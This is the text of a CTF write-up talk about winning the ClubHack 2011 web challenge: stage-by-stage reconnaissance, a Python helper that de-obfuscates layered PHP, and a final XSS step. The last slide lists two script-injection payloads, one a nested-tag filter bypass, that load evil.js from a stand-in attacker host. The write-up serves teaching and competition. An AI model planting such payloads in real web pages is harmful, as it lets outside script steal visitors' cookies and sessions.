How I won ClubHack 2011 CTF

                              AMol NAik
           http://amolnaik4.blogspot.com
Agenda
   Introduction to CTF
   ClubHack 2011 preCON CTF
   Tools
   Execution Stages
   Thanks/Questions
Introduction to CTF
   CTF stands for Capture the Flag

   Types:
       Pre-conference
       Educational
       Web based
       Exploitation
       Web + Exploitation
       Teams / Individuals
       Offensive / Defensive
ClubHack 2011 preCON CTF
   Free conference entry

   Qualified to play Treasure Hunt @ClubHack
       Physical CTF


   Web Based
Tools
   Mozilla Firefox
       Add-on: Tamper Data


   Web Server with PHP

   Brain
   Time
   Patience
   ……..
   ……..
Execution
   Register for the event
   Access CTF site
   Gather Information & Analyze
   Look for hidden treasures
   Get the Flag and Submit
Stage - 1
   Information Gathering
       Download.html
           Can be used to download files from server
           Two params: filename & some HASH
           How important is the hash for the file download?
           What type of hash is it?
           How is it generated?


       UserLogin.html
           Auth Bypass
           Guessable Logins
           What else ???
Stage - 1
   Analysis
       Download.html
           Need hash to download file
           Hash is SHA1
           How to generate it?


       UserLogin.html
           No SQLi
           No Auth Bypass
           No Guessable Login
           Brute Force ???
Stage - 2
   Deep Inspection
       Found 'execute.php' in the source of download.html
       Looks like a command utility
       OS commanding ???

   Analysis
       No OS command execution
       "Wonly one command"
       Commands which take 'file' as a parameter ???

   Single Command
       sha1sum
Stage - 3
   Something to work on
       Hash generation – execute.php
       File Download – download.php
       Login – UserLogin.php

   Try to download files
       Download.php
       Execute.php
       UserLogin.php

   Analysis
       Only 'UserLogin.php' is possible to download
Stage - 4
   Obfuscated PHP Code
       UserLogin.php is obfuscated
       "Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar"
       No online de-obfuscation tool available
           I was not able to find one


   Analysis
       Go Manual Mode !!
       Create scripts
Stage - 5
   De-Obfuscation
       Replace eval() with echo()
       base64_decode()
       Decode $variable names
       Replace $variables
       ROT13 -> base64_decode() -> gzinflate()
       Just echo
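The de-obfuscation steps above, as an added example that is not part of the deck: a small static unwrapper that resolves `$var = 'funcname'` indirection, then peels `eval(gzinflate(base64_decode(str_rot13('...'))))` layers the way the slide describes. The sample input is constructed here with `build_sample()`, not the real UserLogin.php, and the assumption that the obfuscator stores function names as plain quoted strings is an assumption of this example.

```python
import base64
import codecs
import re
import zlib

# Decoders the obfuscator chains, mapped to Python equivalents.
# PHP gzinflate() is raw DEFLATE without a zlib header, hence wbits=-15.
DECODERS = {
    "str_rot13": lambda b: codecs.decode(b.decode("ascii"), "rot13").encode("ascii"),
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),
}

# $v = 'funcname';  -- assignments used to hide which built-in is called
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*(['\"])(\w+)\2\s*;")
# eval(<decoder>(<decoder>(...('payload')...)));  -- one wrapper layer
LAYER_RE = re.compile(
    r"eval\s*\(\s*((?:(?:gzinflate|base64_decode|str_rot13)\s*\(\s*)+)"
    r"(['\"])([^'\"]*)\2\s*\)+\s*;?",
    re.DOTALL,
)


def resolve_variable_calls(src):
    """Slide step 'Replace $variables': turn $v(...) into funcname(...)."""
    names = {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(src)}
    return re.sub(
        r"\$(\w+)\s*\(",
        lambda m: names[m.group(1)] + "(" if m.group(1) in names else m.group(0),
        src,
    )


def eval_to_echo(src):
    """Slide step 'Replace eval() with echo()': make PHP print the next layer."""
    return re.sub(r"\beval\s*\(", "echo(", src)


def decode_layer(src):
    """Statically decode one eval() wrapper; return the inner source or None."""
    src = resolve_variable_calls(src)
    m = LAYER_RE.search(src)
    if not m:
        return None
    chain = re.findall(r"gzinflate|base64_decode|str_rot13", m.group(1))
    data = m.group(3).encode("ascii")
    for name in reversed(chain):  # PHP evaluates the innermost call first
        data = DECODERS[name](data)
    return data.decode("utf-8", errors="replace")


def deobfuscate(src, max_layers=20):
    """Peel wrappers until no eval() layer remains; returns every layer seen."""
    layers = [src]
    for _ in range(max_layers):
        inner = decode_layer(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    return layers


# ---- constructed sample (hypothetical, not the real UserLogin.php) ----
INNER_SOURCE = "$credfile = 'myhashesarenothere.txt'; $next = 'Final.php';"


def build_sample(inner=INNER_SOURCE):
    """Wrap `inner` as ROT13 -> base64 -> gzinflate, then base64 via a $variable."""
    c = zlib.compressobj(wbits=-15)  # raw DEFLATE, what gzinflate() expects
    deflated = c.compress(inner.encode()) + c.flush()
    rot = codecs.encode(base64.b64encode(deflated).decode("ascii"), "rot13")
    layer2 = f"eval(gzinflate(base64_decode(str_rot13('{rot}'))));"
    outer = base64.b64encode(layer2.encode()).decode("ascii")
    return f"$fn = 'base64_decode'; eval($fn('{outer}'));"


OBFUSCATED_SAMPLE = build_sample()

if __name__ == "__main__":
    for i, layer in enumerate(deobfuscate(OBFUSCATED_SAMPLE)):
        print(f"--- layer {i} ---\n{layer}")
```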
Stage - 5
   Analysis
       Credentials -> 'myhashesarenothere.txt'
       Successful Login -> Final.php

   Next
       Access 'myhashesarenothere.txt'
       Login in UserLogin.php
Stage – 6: Final
   Information Gathering
       POST form
       Looks like mail client
       Hard-coded email addresses & Subject
       Message is the only available space for User Input


   Analysis
       Tamper 'TO' email address & 'Subject'
       Test 'Message' for SQLi, Code Injection, ….
       What else ???
Stage – 6: Final
   Damn…It's a ROCK !!!!
   No server-side bug
       Code Injection
       SQLi
   Only XSS
   No <script> & <img>
   May be flag.txt
   May be messages.txt || mail.txt || sec*.txt
   ?????
   ?????
Stage – 6: Final
   A Ray of Hope
       Tweet from @ClubHack



   Only “XSS”
       Never seen XSS in CTF
       What to exploit?
       Myself??
       Event Handlers
       document.cookie
       Did they mean “Some Cookie” ?
Final
   After 2-days
       Got Flag & Submit link
       Free entry to ClubHack -> Secured !!


   Payloads Used:
       <ScRiPt src="http://attacker.com/evil.js"></script>
           me
       <scr<script>ipt src="http://attacker.com/evil.js"></script>
           Vishal Oza
Thanks/Questions
   webDEViL
       CTF Creation and Access for “Live Demo”
   ClubHack
       Organizing CTF challenge
       For Gifts !!!




                     http://twitter.com/amolnaik4
